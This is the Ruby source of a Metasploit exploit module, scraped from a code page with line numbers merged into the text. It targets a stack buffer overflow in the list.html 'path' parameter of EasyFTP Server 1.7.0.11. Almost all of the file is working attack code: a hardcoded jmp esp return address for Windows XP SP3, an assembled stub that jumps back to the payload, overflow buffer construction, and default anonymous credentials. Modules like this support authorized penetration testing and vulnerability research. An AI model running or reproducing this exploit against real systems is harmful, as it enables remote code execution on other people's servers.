Path: blob/master/modules/exploits/windows/http/easyftp_list.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78HttpFingerprint = { :pattern => [ /Easy-Web Server\// ] }910include Msf::Exploit::Remote::HttpClient1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'EasyFTP Server list.html path Stack Buffer Overflow',17'Description' => %q{18This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.1119and earlier. EasyFTP fails to check input size when parsing the 'path' parameter20supplied to an HTTP GET request, which leads to a stack based buffer overflow.21EasyFTP allows anonymous access by default; valid credentials are typically22unnecessary to exploit this vulnerability.2324After version 1.7.0.12, this package was renamed "UplusFtp".2526Due to limited space, as well as difficulties using an egghunter, the use of27staged, ORD, and/or shell payloads is recommended.28},29'Author' => [30'ThE g0bL!N', # Original exploit [see References]31'jduck' # Metasploit re-implementation32],33'References' => [34[ 'OSVDB', '66614'],35[ 'EDB', '11500' ]36],37'DefaultOptions' => {38'EXITFUNC' => 'thread'39},40'Privileged' => true,41'Payload' => {42'Space' => 256,43'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2b\x2f\x3b\x3f\x5c",44'Compat' =>45{46'ConnectionType' => '+ws2ord',47},48},49'Platform' => 'win',50'Targets' => [51[52'Windows XP SP3 - Easy FTP Server Universal',53# NOTE: It's not possible to use addresses within the54# binary due to the nul byte.55{56'Ret' => 0x7cc5d507 # jmp esp in shell32.dll57# 'Ret' => 0xdeadbeef58}59]60],61'DefaultTarget' => 0,62'DisclosureDate' => '2010-02-18',63'Notes' => {64'Reliability' => UNKNOWN_RELIABILITY,65'Stability' => UNKNOWN_STABILITY,66'SideEffects' => UNKNOWN_SIDE_EFFECTS67}68)69)7071register_options(72[73Opt::RPORT(8080),74OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'anonymous']),75OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', '[email protected]'])76]77)78end7980def check81info = http_fingerprint # check method82if info and (info =~ /Easy\-Web Server\//)83return Exploit::CheckCode::Detected84end8586Exploit::CheckCode::Safe87end8889def exploit90if (payload.encoded.length > payload_space)91fail_with(Failure::Unknown, "Insufficient space for payload, try using a staged, ORD and/or shell payload.")92end9394# Fix up ESP, jmp to the beginning of the buffer95stub_asm = %q{96mov edi, esp97add esp, 0xfffffc0498add edi, 0xfffffee899jmp edi100}101stub = Metasm::Shellcode.assemble(Metasm::Ia32.new, stub_asm).encode_string102103# Build the path up104path = ''105path << payload.encoded106path << rand_text(268 - path.length)107# NOTE: It's possible to overwrite SEH, however SafeSEH is in effect.108path << [target.ret].pack('V')109path << rand_text(280 - path.length)110path << stub111path << rand_text(332 - path.length)112113uri = "/list.html?path="114uri << path115116print_status("Trying target #{target.name}...")117res = send_request_raw({ 'uri' => uri }, 5)118119if (res)120print_error("The server unexpectedly responded, this is not good.")121print_status(res.to_s)122end123124handler125end126end127128129